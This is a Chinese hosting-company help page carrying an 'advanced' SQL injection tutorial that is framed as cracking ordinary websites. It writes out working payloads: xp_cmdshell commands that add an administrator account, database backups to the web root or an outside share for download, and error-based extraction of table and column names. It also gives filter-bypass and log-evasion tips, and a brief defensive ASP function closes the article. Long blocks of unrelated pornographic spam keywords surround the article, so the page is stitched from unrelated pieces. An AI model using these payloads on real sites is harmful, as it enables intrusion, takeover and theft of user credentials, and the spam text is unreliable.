a毛片毛费观看-a毛片在线-a毛片在线观看-a毛片在线免费观看-国产成人综合洲欧美在线-国产成人综合高清在线观看

始創于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業
  • 60秒人工響應
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補償
您的位置: 網站首頁 > 幫助中心>文章內容

SQL注入攻擊三部曲之高級篇

發布時間:  2012/6/16 18:07:05
 經過了入門篇進階篇的學習,相信諸位想要破解一般的網站是沒有什么問題了,但是先別得意。正所謂學海無涯,技術的進步也是沒有止境的。SQL注入是一個看起來簡單,但是變數很多的過程。接下來的高級篇讓我們更加深入地探討SQL注入問題。

第一節、利用系統表注入SQLServer數據庫

SQL Server是一個功能強大的數據庫系統,與操作系統也有緊密的聯系,這給開發者帶來了很大的方便,但另一方面,也為注入者提供了一個跳板,我們先來看看幾個具體的例子:

① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--

分號;在SQLServer中表示隔開前后兩句語句,--表示后面的語句為注釋,所以,這句語句在SQLServer中將被分成兩句執行,先是Select出ID=1的記錄,然后執行存儲過程xp_cmdshell,這個存儲過程用于調用系統命令,于是,用net命令新建了用戶名為name、密碼為password的windows的帳號,接著:

② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--

將新建的帳號name加入管理員組,不用兩分鐘,你已經拿到了系統最高權限!當然,這種方法只適用于用sa連接數據庫的情況,否則,是沒有權限調用xp_cmdshell的。

③ http://Site/url.asp?id=1 ;and db_name()>0

前面有個類似的例子and user>0,作用是獲取連接用戶名,db_name()是另一個系統變量,返回的是連接的數據庫名。

④ http://Site/url.asp?id=1;backup database 數據庫名 to disk=’c:\inetpub\wwwroot\1.db’;--

這是相當狠的一招,從③拿到的數據庫名,加上某些IIS出錯暴露出的絕對路徑,將數據庫備份到Web目錄下面,再用HTTP把整個數據庫就完完整整的下載回來,所有的管理員及用戶密碼都一覽無遺!在不知道絕對路徑的時候,還可以備份到網絡地址的方法(如\\202.96.xx.xx\Share \1.db),但成功率不高。

⑤ http://Site/url.asp?id=1 ;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0

前面說過,sysobjects是SQLServer的系統表,存儲著所有的表名、視圖、約束及其它對象,xtype=’U’ and status>0,表示用戶建立的表名,上面的語句將第一個表名取出,與0比較大小,讓報錯信息把表名暴露出來。第二、第三個表名怎么獲取?還是留給我們聰明的讀者思考吧。

⑥ http://Site/url.asp?id=1 ;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0

從⑤拿到表名后,用object_id(‘表名’)獲取表名對應的內部ID,col_name(表名ID,1)代表該表的第1個字段名,將1換成2,3,4...就可以逐個獲取所猜解表里面的字段名。

以上6點是我研究SQLServer注入半年多以來的心血結晶,可以看出,對SQLServer的了解程度,直接影響著成功率及猜解速度。在我研究SQLServer注入之后,我在開發方面的水平也得到很大的提高,呵呵,也許安全與開發本來就是相輔相成的吧。

第二節、繞過程序限制繼續注入

在入門篇提到,有很多人喜歡用’號測試注入漏洞,所以也有很多人用過濾’號的方法來“防止”注入漏洞,這也許能擋住一些入門者的攻擊,但對SQL注入比較熟悉的人,還是可以利用相關的函數,達到繞過程序限制的目的。

在“SQL注入的一般步驟”一節中,我所用的語句,都是經過我優化,讓其不包含有單引號的;在“利用系統表注入SQLServer數據庫”中,有些語句包含有’號,我們舉個例子來看看怎么改造這些語句:

簡單的如where xtype=’U’,字符U對應的ASCII碼是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用戶’,可以用where name=nchar(29992)+nchar(25143)代替。

第三節、經驗小結

1.有些人會過濾Select、Update、Delete這些關鍵字,但偏偏忘記區分大小寫,所以大家可以用selecT這樣嘗試一下。

2.在猜不到字段名時,不妨看看網站上的登錄表單,一般為了方便起見,字段名都與表單的輸入框取相同的名字。

3.特別注意:地址欄的+號傳入程序后解釋為空格,%2B解釋為+號,%25解釋為%號,具體可以參考URLEncode的相關介紹。

4.用Get方法注入時,IIS會記錄你所有的提交字符串,對Post方法做則不記錄,所以能用Post的網址盡量不用Get。

5. 猜解Access時只能用Ascii逐字解碼法,SQLServer也可以用這種方法,只需要兩者之間的區別即可,但是如果能用SQLServer的報錯信息把值暴露出來,那效率和準確率會有極大的提高。

防范方法

SQL注入漏洞可謂是“千里之堤,潰于蟻穴”,這種漏洞在網上極為普遍,通常是由于程序員對注入不了解,或者程序過濾不嚴格,或者某個參數忘記檢查導致。在這里,我給大家一個函數,代替ASP中的Request函數,可以對一切的SQL注入Say NO,函數如下: 
 

  1. Function SafeRequest(ParaName,ParaType)   
  2.  '--- 傳入參數 ---   
  3.  'ParaName:參數名稱-字符型   
  4.  'ParaType:參數類型-數字型(1表示以上參數是數字,0表示以上參數為字符)   
  5.  
  6.  Dim ParaValue   
  7.  ParaValue=Request(ParaName)   
  8.  If ParaType=1 then   
  9. If not isNumeric(ParaValue) then   
  10.  Response.write "參數" & ParaName & "必須為數字型!"   
  11.  Response.end   
  12. End if   
  13.  Else   
  14. ParaValue=replace(ParaValue,"'","''")   
  15.  End if   
  16.  SafeRequest=ParaValue   
  17. End function  

本文出自:億恩科技【www.ibaoshan.net】

服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線

     
     
    欧美顶级METART裸体全部自| 中国女人内射6XXXXX| 麻豆CHINESE男男GAYF| 粉嫩人妻一区二区三区| 亚洲日韩精品一区二区三区无码| 人妻丰满熟妇AV无码区APP| 黄A大片AV永久免费| Z〇ZOZ〇女人另类ZOZ〇| 亚洲国产精品无码久久一区二区| 人妻无码AⅤ不卡中文字幕| 极品无码AV国模在线观看| 爆乳JK美女脱内衣裸体网站| 亚洲精品无码久久久久久小说| 日本三级黄色视频| 精品无人区卡卡二卡三乱码| 成熟妇女性成熟满足视频| 野花高清完整版免费观看视频大全| 日韩亚洲欧美精品综合 | 影视先锋AV资源噜噜| 四川小少妇BBAABBAA| 蜜桃Av噜噜一区二区三区绯色| 国产精品亚洲综合色区韩国| 97国产精华最好的产品| 性中国少妇熟妇XXXX农村| 漂亮人妻熟睡中被公侵犯中文版| 精品人妻系列无码专区| 丰满少妇被粗大猛烈进人高清| 在线天堂中文在线资源网| 性CHINESE新婚VIDEO| 欧美天天综合色影久久精品| 精品国产AV一区二区三区| 成人免费一区二区三区视频软件| 又粗又粗又黄又硬又深色的| 西西顶级艺术人像摄影| 欧美人与动牲交A免费| 精品九九人人做人人爱| 公交车大龟廷进我身体里| 13277大但人文艺术日本活动| 亚洲AV无码成人精品区明星换面 | 国产成人亚洲精品无码H在线| 18禁又污又黄又爽的网站| 亚洲AV理论在线电影网| 日本A级作爱免费观看在线| 久久久久久久久蜜桃| 国产精品国产三级国产AV剧情| FREE国产粉嫩熟妇XXXHD| 亚洲午夜国产成人AV电影| 无码一区二区三区| 人人人人人人一摸| 老师扒开粉嫩粉嫩的泬| 国产小便视频在线播放| 成人18禁在线播放| 中日大胆裸体棚拍人体| 亚洲AV永久无码精品网站在线观 | 凹凸在线无码免费视频| 亚洲中文无码线在线观看| 无套内内射视频网站| 日本粉色IPHONE| 美女用香蕉练口活视频| 好男人好资源在线影视官网 | 亚洲国产精品一区二区久久| 丝袜一区二区三区在线播放| 欧美激情一区二区三区成人| 久久国产免费直播| 国产麻豆放荡AV剧情演绎| 边做饭边被躁我和邻居的视频| 用舌头去添高潮无码视频| 亚洲 熟 图片 小说 乱 妇| 日本无人区码一二三区别| 蜜桃传媒在线观看免费版7| 狠狠躁夜夜躁无码中文字幕| 国产AⅤ无码旗袍丝袜美腿| JAPANESE护士高潮SEX| 一本加勒比波多野结衣高清| 亚洲AV无码一区二区三区人区| 色一情一乱一伦一区二区三区日本| 女学生14毛片视频片二毛| 久久99国产精品久久99蜜桃| 国产乱人伦偷精品视频不卡| 成熟妇女一区av| A级毛片毛片免费观的看久| 野花日本大全免费观看2019| 国产精品99久久久精品无码| 女人18片毛片60分钟630| 极品教师高清免费观看| 国产成人AV区一区二区三| WW欧日韩视频高清在线| 伊人久久大香线蕉无码不卡| 亚洲AV永久无码精品无码流畅| 丝袜一区二区三区在线播放 | 人人妻人人澡人人爽人人蜜臀| 麻花传媒免费网站在线观看 | 免费A级毛片18禁网站APP| 精品少妇AY一区二区三区| 国产精品视频永久免费播放| 动漫RH男男车车好快的车车| BBBBB毛茸茸BBBBBBB| 岳胀耸的雪乳奶水| 亚洲人成网站18禁止大| 亚洲AV色一区二区三区蜜桃| 我们还没在书房试过| 色猫咪AV在线网址| 人人妻人人澡人人爽不卡视频| 妞干网在线视频免费观看| 胯下娇喘的班主任| 久久国产高潮流白浆免费观看 | 国产AV一区二区三区天堂综合网| 99久久国产综合精品成人影院| 国产熟睡乱子伦视频在线观看| 畜禽CROPROATION| WWW夜片内射视频在观看视频| 最新国产在线拍揄自揄视频| 亚洲日韩中文第一精品| 亚洲AV无码卡通动漫AV| 无码国产偷倩在线播放老年人| 日韩中文高清在线专区| 人喾交性专区免费看| 欧美黑人巨大精品VIDEOS| 蜜臀久久AV无码牛牛影视 | 日韩一区二区三区无码影院| 秋霞久久国产精品电影院| 女教师の爆乳BD在线观看| 麻豆国产成人AV在线播放欲色| 久久精品国产亚洲AV麻豆长发| 黑人疯狂巨大XXⅩ0O0| 国产性大战XXXXX久久久| 国产精品成人AV片免费看| 国产嗷嗷叫高潮快点再用力| 东北大坑续集1至60| 边做边爱免费视频| 啊灬啊灬啊灬快灬高潮了老| CHINESE国产HD中国熟女| 99国精产品W灬源码1688钻| 2021无码专区人妻系列日韩| 玉蒲团之官人我要| 一二三四中文字幕在线看| 亚洲综合久久精品无码色欲| 亚洲欧美日韩中文字幕在线一区 | 精品久久久久久无码人妻| 黑人巨大猛烈捣出白浆视频在线| 国产偷V国产偷V亚洲高清| 国产精品亚洲日韩欧美色窝窝色欲 | 中文字幕人成乱码中国| 玉蒲团2之玉女心经| 伊人久久亚洲综合| 一二三四免费观看在线6| 野花香电视剧全集免费观看| 亚洲午夜理论无码电影| 亚洲熟妇无码A∨| 亚洲无线观看国产高清| 野花高清在线观看免费3| 亚洲综合网国产精品一区| 亚洲一区二区三区无码中文字幕 | 亚洲AV成人片色在线高潮| 亚洲 欧洲 日韩 综合 第一页| 午夜内射高潮视频| 午夜无码伦费影视在线观看| 午夜亚洲国产理论片中文飘花| 无遮挡H肉动漫在线播放| 无码成人一区二区| 无码AV专区丝袜专区| 午夜天堂AV天堂久久久| 性饥渴老妇XXXⅩOOO| 小蜜被两老头吸奶头在线观看| 亚州中文字幕无码中文字幕| 亚洲AV无码精品色午夜在线观看 | 野花韩国高清免费神马百度| 一个添下面两个吃奶把腿扒开| 一本大道无码AV天堂| 又湿又紧又大又爽又A视频| 中文字幕V亚洲ⅤV天堂| 18大禁漫画吃奶羞羞漫画| 99久9在线 | 免费| FREE嫩白18SEⅩ性HD处| 宝贝腿开大点我添添公口述视频| 成 人 黄 色 网 站 在线观| 丁香花在线电影小说| 国产A√精品区二区三区四区| 国产精品久久777777| 国产麻豆一精品一AV一免费| 国精品无码人妻一区二区三区| 激情五月色综合国产精品| 久久精品国产网红主播| 老熟女DHXⅩXXX88老妇女| 免费网站正能量WWW正能量| 欧美乱码卡1卡2卡三卡四卡| 人人添人人妻人人爽夜欢视AV | 韩国善良的小峓子在钱| 九九九精品成人免费视频| 久久人人爽人人爽人人片AV高请| 老头猛的挺进她莹莹的体导演是谁| 妺妺窝人体色WWW国产馆在线| 欧美日韩国产综合草草| 日韩AV无码社区一区二区三区| 丝袜灬啊灬快灬高潮了AV| 午夜性又黄又爽免费看尤物| 亚洲妇熟XXXX妇色黄无码| 亚洲性色AV私人影院无码| 中文字幕VA一区二区三区| MM131美女图片高清图片视频|